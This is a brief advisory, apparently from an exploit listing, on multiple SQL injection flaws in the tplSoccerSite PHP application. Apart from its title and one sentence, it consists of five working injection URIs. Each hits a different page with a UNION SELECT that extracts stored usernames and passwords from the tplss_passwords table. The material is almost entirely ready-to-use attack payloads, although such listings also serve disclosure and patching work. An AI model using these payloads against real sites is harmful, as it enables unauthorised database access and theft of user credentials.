tplSoccerSite Multiple SQL Injection Vulnerabilities

tplSoccerSite Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/*
http://www.example.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/*
http://www.example.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/*
http://www.example.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/*
http://www.example.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/*